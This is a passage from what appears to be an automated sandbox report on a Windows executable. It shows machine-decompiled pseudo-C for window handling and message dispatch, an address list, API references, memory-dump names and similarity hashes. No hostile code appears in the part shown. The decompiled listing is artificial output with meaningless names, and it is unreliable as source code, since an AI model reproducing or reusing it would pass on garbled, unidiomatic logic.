										if( *(_t591 + 0x38) != 0) {
											goto L57;
										} else {
											E00403E54();
											goto L150;
										}
									}
								} else {
									 *((intOrPtr*)( *_v8 + 0x44))();
									_t596 =  *(_t833 + 0xc) - 1;
									__eflags = _t596;
									if(_t596 == 0) {
										_t598 =  *((intOrPtr*)( *_v8 + 0x120))();
										__eflags = _t598;
										if(_t598 == 0) {
											_t600 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t600;
											if(_t600 != 0) {
												L41:
												 *(_v12 + 0xc) = 0x20;
											} else {
												_t612 =  *((intOrPtr*)( *_v8 + 0x120))();
												__eflags = _t612;
												if(_t612 != 0) {
													goto L41;
												}
											}
											_t603 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t603;
											if(_t603 != 0) {
												_t610 = _v12;
												_t70 = _t610 + 0xc;
												 *_t70 =  *(_t610 + 0xc) | 0x00000010;
												__eflags =  *_t70;
											}
											_t605 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t605;
											if(_t605 != 0) {
												_t609 = _v12;
												_t75 = _t609 + 0xc;
												 *_t75 =  *(_t609 + 0xc) | 0x00000040;
												__eflags =  *_t75;
											}
											_t607 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t607;
											if(_t607 != 0) {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000020;
											}
											goto L82;
										} else {
											 *[fs:eax] = _t1051;
											E00420784( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
											E00420600( *((intOrPtr*)(_v8 + 0x210)));
											E0042061C( *((intOrPtr*)(_v8 + 0x210)));
											_v13 =  *((intOrPtr*)( *_v8 + 0xfc))( *[fs:eax], 0x471e15, _t1049);
											_pop(_t965);
											 *[fs:eax] = _t965;
											_push(0x471e1c);
											__eflags = 0;
											return E00420784( *((intOrPtr*)(_v8 + 0x210)), 0);
										}
									} else {
										_t631 = _t596 - 1;
										__eflags = _t631;
										if(_t631 == 0) {
											_t633 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t633;
											if(_t633 != 0) {
												 *((intOrPtr*)( *_v8 + 0xfc))();
											}
										} else {
											_t636 = _t631 - 1;
											__eflags = _t636;
											if(_t636 == 0) {
												_t638 =  *((intOrPtr*)( *_v8 + 0x120))();
												__eflags = _t638;
												if(_t638 != 0) {
													 *((intOrPtr*)( *_v8 + 0xfc))();
												}
											} else {
												__eflags = _t636 == 1;
												if(_t636 == 1) {
													_t643 =  *((intOrPtr*)( *_v8 + 0x120))();
													__eflags = _t643;
													if(_t643 != 0) {
														 *((intOrPtr*)( *_v8 + 0xfc))();
													}
												}
											}
										}
										L82:
										__eflags = 0;
										_pop(_t921);
										 *[fs:eax] = _t921;
										_push(0x472844);
										return E004205D8( *((intOrPtr*)(_v8 + 0x210)));
									}
								}
							}
						} else {
							_t646 = _t464 - 7;
							__eflags = _t646;
							if(_t646 == 0) {
								 *((char*)(_v8 + 0x231)) = 1;
							} else {
								__eflags = _t646 == 3;
								if(_t646 == 3) {
									 *((char*)(_v8 + 0x230)) = 1;
								}
							}
							goto L150;
						}
					} else {
						if(__eflags == 0) {
							E0046FB5C( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
							_t655 = E004037D8(_v8, __eflags);
							__eflags = _t655;
							if(_t655 == 0) {
								 *(_v12 + 0xc) = 1;
							}
						} else {
							_t657 = _t463 - 0xffffff98;
							__eflags = _t657;
							if(__eflags == 0) {
								_t854 = E0046FB2C( *((intOrPtr*)(_v8 + 0x22c)), __eflags) - 1;
								__eflags = _t854;
								if(__eflags >= 0) {
									do {
										E0046FB5C( *((intOrPtr*)(_v8 + 0x22c)), _t854, __eflags);
										E004037D8(_v8, __eflags);
										_t854 = _t854 - 1;
										__eflags = _t854 - 0xffffffff;
									} while (__eflags != 0);
								}
							} else {
								_t666 = _t657 - 1;
								__eflags = _t666;
								if(__eflags == 0) {
									E004037D8(_v8, __eflags);
								} else {
									_t671 = _t666 - 1;
									__eflags = _t671;
									if(__eflags == 0) {
										E0046FB5C( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
										E004037D8(_v8, __eflags);
									} else {
										__eflags = _t671 - 1;
										if(__eflags == 0) {
											_t855 = _t1029;
											E0046FB5C( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t855 + 0xc)), __eflags);
											E004037D8(_v8, __eflags);
											_t685 = _v8;
											__eflags =  *((short*)(_t685 + 0x36a));
											if( *((short*)(_t685 + 0x36a)) != 0) {
												__eflags =  *((intOrPtr*)(_t855 + 0x1c)) - 8;
												if( *((intOrPtr*)(_t855 + 0x1c)) == 8) {
													__eflags =  *(_t855 + 0x18) & 0x00000002;
													if(( *(_t855 + 0x18) & 0x00000002) == 0) {
														L139:
														__eflags =  *(_t855 + 0x18) & 0x00000002;
														if(( *(_t855 + 0x18) & 0x00000002) == 0) {
															__eflags =  *(_t855 + 0x14) & 0x00000002;
															if(( *(_t855 + 0x14) & 0x00000002) != 0) {
																 *((intOrPtr*)(_v8 + 0x368))(1);
															}
														}
													} else {
														__eflags =  *(_t855 + 0x14) & 0x00000002;
														if(( *(_t855 + 0x14) & 0x00000002) != 0) {
															goto L139;
														} else {
															 *((intOrPtr*)(_v8 + 0x368))(0);
														}
													}
												}
											}
											_t687 =  *((intOrPtr*)( *_v8 + 0x3c))();
											__eflags = _t687;
											if(_t687 != 0) {
												_t688 = _v8;
												__eflags =  *(_t688 + 0x1c) & 0x00000010;
												if(( *(_t688 + 0x1c) & 0x00000010) == 0) {
													_t689 = _v8;
													__eflags =  *(_t689 + 0x6c);
													if( *(_t689 + 0x6c) != 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x6c)))) + 0x18))();
													}
												}
											}
										} else {
										}
									}
								}
							}
						}
						goto L150;
					}
				} else {
					if(_t1052 == 0) {
						E004719F4(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
						_t702 = E004037D8(_v8, __eflags);
						__eflags = _t702;
						if(_t702 == 0) {
							 *(_v12 + 0xc) = 1;
						}
						_t703 = _v12;
						__eflags =  *(_t703 + 0xc);
						if( *(_t703 + 0xc) == 0) {
							_t858 = E00426C44(E0043C1F4(_v8));
							 *(_v8 + 0x258) = _t858;
							 *((intOrPtr*)(_v8 + 0x254)) = GetWindowLongA(_t858, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x258), 0xfffffffc,  *(_v8 + 0x250));
						}
					} else {
						_t1053 = _t463 - 0xffffff8d;
						if(_t1053 > 0) {
							_t715 = _t463 - 0xffffff8f;
							__eflags = _t715;
							if(_t715 == 0) {
								 *((intOrPtr*)( *_v8 + 0x118))();
							} else {
								_t720 = _t715 - 4;
								__eflags = _t720;
								if(_t720 == 0) {
									 *(_v8 + 0x26c) =  *( *((intOrPtr*)(_v12 + 8)) + 0xc);
								} else {
									_t724 = _t720 - 1;
									__eflags = _t724;
									if(__eflags == 0) {
										E004730D8(_v8);
										E004037D8(_v8, __eflags);
									} else {
										__eflags = _t724 == 2;
										if(_t724 == 2) {
											_t732 = _t1029;
											__eflags =  *(_t732 + 0x20);
											if( *(_t732 + 0x20) != 0) {
												__eflags =  *((intOrPtr*)(_t732 + 0x10)) - 0xffffffff;
												if(__eflags != 0) {
													E004037D8(_v8, __eflags);
												}
											}
										}
									}
								}
							}
						} else {
							if(_t1053 == 0) {
								 *((intOrPtr*)( *_v8 + 0x11c))(E00471B5C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x18))), E00471B5C( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x14))));
							} else {
								_t741 = _t463 - 0xfffffecc;
								if(_t741 == 0) {
									_t1042 =  *(_t1029 + 0x14);
									__eflags =  *_t1042 & 0x00000001;
									if(( *_t1042 & 0x00000001) != 0) {
										_t744 = E004730D8(_v8);
										__eflags =  *((intOrPtr*)(_t744 + 0x18)) - _t1042[4];
										if( *((intOrPtr*)(_t744 + 0x18)) < _t1042[4]) {
											_t747 = E004730D8(_v8);
											__eflags =  *((intOrPtr*)(_t747 + 0x14)) - _t1042[4];
											if( *((intOrPtr*)(_t747 + 0x14)) <= _t1042[4]) {
												_push( *((intOrPtr*)(E004730D8(_v8) + 0x14)));
												_t753 = E004730D8(_v8);
												_pop(_t999);
												E0046EC6C(_t753, _t999);
											}
										} else {
											_push( *((intOrPtr*)(E004730D8(_v8) + 0x18)));
											_t759 = E004730D8(_v8);
											_pop(_t1002);
											E0046EC6C(_t759, _t1002);
										}
									}
								} else {
									_t761 = _t741 - 0x97;
									if(_t761 == 0) {
										_t762 = _v8;
										__eflags =  *((short*)(_t762 + 0x35a));
										if( *((short*)(_t762 + 0x35a)) != 0) {
											E00440808( &_v168);
											_t766 =  *0x49111c; // 0x492c04
											E004563B8( *_t766, __ebx,  &_v168, __edi, _t1029);
										}
									} else {
										_t769 = _t761 - 5;
										if(_t769 == 0) {
											_t864 = _t1029;
											_v14 = E00471B38( *(_t864 + 0x10));
											_t1043 = 0;
											E00404348( &_v20);
											E004067C4(0,  &_v28, 0);
											_v29 = 4;
											_t778 = _v14 - 1;
											__eflags = _t778;
											if(_t778 < 0) {
												_t1043 =  *((intOrPtr*)(_t864 + 0x18));
											} else {
												__eflags = _t778 - 2;
												if(__eflags < 0) {
													_t1025 =  *(_t864 + 0x14);
													__eflags = _t1025;
													if(_t1025 == 0) {
														E00404348( &_v20);
													} else {
														E00408DCC(_t1025,  &_v20);
													}
												} else {
													if(__eflags == 0) {
														_v28 =  *((intOrPtr*)(_t864 + 0x1c));
														_v24 =  *((intOrPtr*)(_t864 + 0x20));
														_t795 =  *((intOrPtr*)(_t864 + 0x24)) - 0x25;
														__eflags = _t795;
														if(_t795 == 0) {
															_v29 = 0;
														} else {
															_t796 = _t795 - 1;
															__eflags = _t796;
															if(_t796 == 0) {
																_v29 = 2;
															} else {
																_t797 = _t796 - 1;
																__eflags = _t797;
																if(_t797 == 0) {
																	_v29 = 1;
																} else {
																	__eflags = _t797 == 1;
																	if(_t797 == 1) {
																		_v29 = 3;
																	}
																}
															}
														}
													}
												}
											}
											_t781 = _v29;
											__eflags =  *(_t864 + 0x10) & 0x00000020;
											E00471B38( *(_t864 + 0x10));
											 *(_v12 + 0xc) =  *((intOrPtr*)( *_v8 + 0x114))(_t781 & 0xffffff00 | ( *(_t864 + 0x10) & 0x00000020) != 0x00000000, _t781,  *((intOrPtr*)(_t864 + 0xc)), _t1043,  &_v28);
										} else {
											if(_t769 == 2) {
												_t1026 = E004719F4(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
												_t866 =  *((intOrPtr*)(_v12 + 8)) + 0xc;
												__eflags =  *_t866 & 0x00000001;
												if(( *_t866 & 0x00000001) != 0) {
													_t1046 = _t866[8];
													__eflags = _t1046;
													if(_t1046 != 0) {
														_v40 =  *((intOrPtr*)(_t1026 + 8));
														_t824 =  *((intOrPtr*)( *_v40 + 0x14))();
														__eflags = _t1046 - _t824;
														if(_t1046 > _t824) {
															 *(_t866[0x14]) = 0;
														} else {
															 *((intOrPtr*)( *_v40 + 0xc))();
															E00408C90(_t866[0x14], _t866[0x18] - 1, _v160);
														}
													} else {
														E00408C90(_t866[0x14], _t866[0x18] - 1,  *((intOrPtr*)(_t1026 + 0x24)));
													}
												}
												__eflags =  *_t866 & 0x00000002;
												if(( *_t866 & 0x00000002) != 0) {
													__eflags = _t866[8];
													if(_t866[8] != 0) {
														_t1045 = _t866[8] - 1;
														__eflags = _t1045;
														if(_t1045 >= 0) {
															_t808 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1026 + 8)))) + 0x14))();
															__eflags = _t1045 - _t808;
															if(_t1045 < _t808) {
																_v36 = E0046F9F0(_t1026);
																__eflags = _t866[8] - 1;
																E00473BF0(_v8, _t866[8] - 1, _t1026,  &_v36);
																_t866[0x1c] = _v36;
															}
														}
													} else {
														E00473164(_v8, _t1026);
														_t866[0x1c] =  *(_t1026 + 0x10);
														_t818 = _v8;
														__eflags =  *(_t818 + 0x220);
														if( *(_t818 + 0x220) != 0) {
															_t866[0xc] = E00426B18( *((intOrPtr*)(_t1026 + 0x20)) + 1);
															_t866[0x10] = 0xf000;
															 *_t866 =  *_t866 | 0x00000008;
														}
													}
												}
												__eflags =  *_t866 & 0x00000010;
												if(( *_t866 & 0x00000010) != 0) {
													_t866[0x24] =  *(_t1026 + 0x14);
												}
											}
										}
									}
								}
							}
						}
					}
					L150:
					_pop(_t916);
					 *[fs:eax] = _t916;
					_push(0x47286c);
					E00404348( &_v160);
					return E00404348( &_v20);
				}
			}

0x00471ba8
0x00471ba9
0x00471bab
0x00471bb1
0x00471bb2
0x00471bb3
0x00471bb6
0x00471bbc
0x00471bbf
0x00471bc2
0x00471bc7
0x00471bc8
0x00471bcd
0x00471bd0
0x00471bd6
0x00471bd9
0x00471bdc
0x00471bdf
0x00471c46
0x00471c49
0x00471c74
0x00471c74
0x00471c77
0x00471d19
0x00471d1c
0x00471d22
0x00471d24
0x00000000
0x00471d2a
0x00471d2d
0x00471d31
0x00471d32
0x00471d37
0x00471d3a
0x00471d3d
0x00471d47
0x00471d4a
0x00471d4d
0x00471d52
0x00471f41
0x00471f46
0x00471f4a
0x00471f4e
0x00471f66
0x00471f70
0x00471f78
0x00471f7b
0x00471f82
0x00471f84
0x00471f8d
0x00471f96
0x00471f98
0x00471fa8
0x00471fb7
0x00471fc1
0x00471fca
0x00471fcc
0x00471fcc
0x00471f98
0x00471fd2
0x00471fd5
0x00471fda
0x0047225e
0x00472263
0x004722bb
0x004722c0
0x00472312
0x00472317
0x00472319
0x0047231d
0x00472351
0x00472361
0x0047231f
0x0047232c
0x00472341
0x00472341
0x0047231d
0x004722c2
0x004722c2
0x004722c6
0x004722fa
0x0047230a
0x004722c8
0x004722d5
0x004722ea
0x004722ea
0x004722c6
0x00472265
0x00472265
0x00472269
0x004722a0
0x004722b0
0x0047226b
0x00472278
0x0047228d
0x0047228d
0x00472269
0x00000000
0x00471fe0
0x00471fe2
0x00471fe3
0x00471fe8
0x00471feb
0x00471ffa
0x0047200e
0x00472025
0x0047202d
0x00472033
0x00472039
0x0047203c
0x00472043
0x00472049
0x0047204c
0x00472056
0x0047205d
0x00472061
0x00472098
0x0047209f
0x004720ae
0x00472063
0x00472070
0x00472077
0x0047207d
0x0047207d
0x0047208b
0x0047208b
0x004720b1
0x004720b5
0x004720cd
0x004720d0
0x004720d7
0x004720e0
0x004720ea
0x004720f0
0x004720f5
0x004720f8
0x004720fb
0x00472100
0x00472103
0x00472106
0x00472109
0x00472117
0x00472130
0x0047214e
0x00472153
0x00472155
0x00472162
0x00472176
0x00472192
0x00472198
0x00472198
0x0047219b
0x0047219b
0x0047219b
0x0047219b
0x00472155
0x004721a1
0x004721a4
0x004721a7
0x004721b5
0x004721bc
0x004720b7
0x004720b7
0x004720ba
0x004720be
0x004720c3
0x00000000
0x004720c3
0x004720b5
0x00471f50
0x00471f53
0x00471f56
0x00471f5a
0x00000000
0x00471f5c
0x00471f5c
0x00000000
0x00471f5c
0x00471f5a
0x00471d58
0x00471d60
0x00471d66
0x00471d66
0x00471d67
0x00471d8c
0x00471d92
0x00471d94
0x00471e3f
0x00471e45
0x00471e47
0x00471e5c
0x00471e5f
0x00471e49
0x00471e52
0x00471e58
0x00471e5a
0x00000000
0x00000000
0x00471e5a
0x00471e6f
0x00471e75
0x00471e77
0x00471e79
0x00471e7c
0x00471e7c
0x00471e7c
0x00471e7c
0x00471e89
0x00471e8f
0x00471e91
0x00471e93
0x00471e96
0x00471e96
0x00471e96
0x00471e96
0x00471ea3
0x00471ea9
0x00471eab
0x00471eb4
0x00471eb4
0x00000000
0x00471d9a
0x00471da5
0x00471db4
0x00471dc8
0x00471ddf
0x00471df4
0x00471df9
0x00471dfc
0x00471dff
0x00471e0d
0x00471e14
0x00471e14
0x00471d69
0x00471d69
0x00471d69
0x00471d6a
0x00471ec6
0x00471ecc
0x00471ece
0x00471ede
0x00471ede
0x00471d70
0x00471d70
0x00471d70
0x00471d71
0x00471ef2
0x00471ef8
0x00471efa
0x00471f0a
0x00471f0a
0x00471d77
0x00471d77
0x00471d78
0x00471f1e
0x00471f24
0x00471f26
0x00471f36
0x00471f36
0x00471f26
0x00471d78
0x00471d71
0x00472367
0x00472367
0x00472369
0x0047236c
0x0047236f
0x00472382
0x00472382
0x00471d67
0x00471d52
0x00471c7d
0x00471c7d
0x00471c7d
0x00471c80
0x0047283d
0x00471c86
0x00471c86
0x00471c89
0x00472831
0x00472831
0x00471c89
0x00000000
0x00471c80
0x00471c4b
0x00471c4b
0x0047271e
0x0047272f
0x00472734
0x00472736
0x0047273f
0x0047273f
0x00471c51
0x00471c51
0x00471c51
0x00471c54
0x004723cb
0x004723cc
0x004723cf
0x004723d5
0x004723e0
0x004723ee
0x004723f3
0x004723f4
0x004723f4
0x004723f9
0x00471c5a
0x00471c5a
0x00471c5a
0x00471c5b
0x004723b1
0x00471c61
0x00471c61
0x00471c61
0x00471c62
0x004726f5
0x00472703
0x00471c68
0x00471c68
0x00471c69
0x0047274e
0x0047275c
0x0047276f
0x00472774
0x00472777
0x0047277f
0x00472781
0x00472785
0x00472787
0x0047278b
0x004727ab
0x004727ab
0x004727af
0x004727b1
0x004727b5
0x004727c7
0x004727c7
0x004727b5
0x0047278d
0x0047278d
0x00472791
0x00000000
0x00472793
0x004727a3
0x004727a3
0x00472791
0x0047278b
0x00472785
0x004727d2
0x004727d5
0x004727d7
0x004727d9
0x004727dc
0x004727e0
0x004727e2
0x004727e5
0x004727e9
0x004727f6
0x004727f6
0x004727e9
0x004727e0
0x00000000
0x00471c6f
0x00471c69
0x00471c62
0x00471c5b
0x00471c54
0x00000000
0x00471c4b
0x00471be1
0x00471be1
0x0047261f
0x0047262f
0x00472634
0x00472636
0x0047263b
0x0047263b
0x00472642
0x00472645
0x00472649
0x0047265c
0x00472661
0x00472672
0x0047268e
0x0047268e
0x00471be7
0x00471be7
0x00471bea
0x00471c1f
0x00471c1f
0x00471c22
0x00472512
0x00471c28
0x00471c28
0x00471c28
0x00471c2b
0x00472396
0x00471c31
0x00471c31
0x00471c31
0x00471c32
0x004726ce
0x004726dc
0x00471c38
0x00471c38
0x00471c3b
0x0047269b
0x0047269d
0x004726a1
0x004726a7
0x004726ab
0x004726bb
0x004726bb
0x004726ab
0x004726a1
0x00471c3b
0x00471c32
0x00471c2b
0x00471bec
0x00471bec
0x00472608
0x00471bf2
0x00471bf2
0x00471bf7
0x00471c99
0x00471c9c
0x00471c9f
0x00471cab
0x00471cb3
0x00471cb6
0x00471ce3
0x00471ceb
0x00471cee
0x00471d02
0x00471d09
0x00471d0e
0x00471d0f
0x00471d0f
0x00471cb8
0x00471cc6
0x00471ccd
0x00471cd2
0x00471cd3
0x00471cd3
0x00471cb6
0x00471bfd
0x00471bfd
0x00471c02
0x004727fb
0x004727fe
0x00472806
0x00472815
0x00472820
0x00472827
0x00472827
0x00471c08
0x00471c08
0x00471c0b
0x00472520
0x0047252a
0x0047252d
0x00472532
0x0047253e
0x00472543
0x0047254a
0x0047254a
0x0047254c
0x00472556
0x0047254e
0x0047254e
0x00472550
0x0047255b
0x0047255e
0x00472560
0x00472571
0x00472562
0x00472567
0x00472567
0x00472552
0x00472552
0x0047257b
0x00472581
0x00472587
0x00472587
0x0047258a
0x00472597
0x0047258c
0x0047258c
0x0047258c
0x0047258d
0x0047259d
0x0047258f
0x0047258f
0x0047258f
0x00472590
0x004725a3
0x00472592
0x00472592
0x00472593
0x004725a9
0x004725a9
0x00472593
0x00472590
0x0047258d
0x0047258a
0x00472552
0x00472550
0x004725b6
0x004725ba
0x004725c5
0x004725dd
0x00471c11
0x00471c14
0x0047240f
0x00472417
0x0047241a
0x0047241d
0x0047241f
0x00472422
0x00472424
0x0047243a
0x00472442
0x00472445
0x00472447
0x00472472
0x00472449
0x00472458
0x00472468
0x00472468
0x00472426
0x00472430
0x00472430
0x00472424
0x00472475
0x00472478
0x0047247a
0x0047247e
0x004724b7
0x004724b8
0x004724ba
0x004724c1
0x004724c4
0x004724c6
0x004724d3
0x004724dd
0x004724e3
0x004724eb
0x004724eb
0x004724c6
0x00472480
0x00472485
0x0047248d
0x00472490
0x00472493
0x0047249a
0x004724a5
0x004724a8
0x004724af
0x004724af
0x0047249a
0x0047247e
0x004724ee
0x004724f1
0x004724fa
0x004724fa
0x004724f1
0x00471c14
0x00471c0b
0x00471c02
0x00471bf7
0x00471bec
0x00471bea
0x00472844
0x00472846
0x00472849
0x0047284c
0x00472857
0x00472864
0x00472864

APIs

GetWindowLongA.USER32 ref: 0047266A
SetWindowLongA.USER32 ref: 0047268E

Strings

, xrefs: 004725BA
l+I, xrefs: 0047280E
(9G, xrefs: 00472106, 00472198, 004720B7, 00472077

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow
String ID: $(9G$l+I
API String ID: 1378638983-1004359958
Opcode ID: 6b8410bd885e83b979a7d62b56eb824b404f9093aaf55ccca18cd60eee052634
Instruction ID: 03fe2370d58e00aab91755da3dbc69af263791dbd4dfcbdf82e9827ea0d508d2
Opcode Fuzzy Hash: 6b8410bd885e83b979a7d62b56eb824b404f9093aaf55ccca18cd60eee052634
Instruction Fuzzy Hash: B9822A34A00204DFCB04DF69C685ADAB7F1FF48314F2581A6E848AB366C778EE41DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0045194C, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0045194C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x451eb6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x49128c; // 0x41d528
					E00406548(_t294,  &_v12);
					E0040A158(_v12, 1);
					E00403DA8();
				}
				_t149 =  *0x492c04; // 0x2410d40
				E00455F24(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x451e99);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x451da0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x492c08; // 0x241094c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00450B38(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043C1F4(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043C1F4(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044C778(E0043C1F4(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043C1F4(_v8), 0);
								} else {
									SetWindowPos(E0043C1F4(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043C1F4(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00439870(_v8);
						}
					} else {
						_push(_t372);
						_push(0x451a04);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E0045317C() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00453170() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x492c04; // 0x2410d40
								_t305 = E00435578( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x492c04; // 0x2410d40
								_t248 = E004355BC( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0044FDEC(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004531AC() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004531A0() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x492c04; // 0x2410d40
										_t311 = E00435578( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x492c04; // 0x2410d40
										_t269 = E004355BC( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x492c04; // 0x2410d40
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44b108; // 0x44b154
									_t290 = E00403768( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E0045317C() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00453170() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
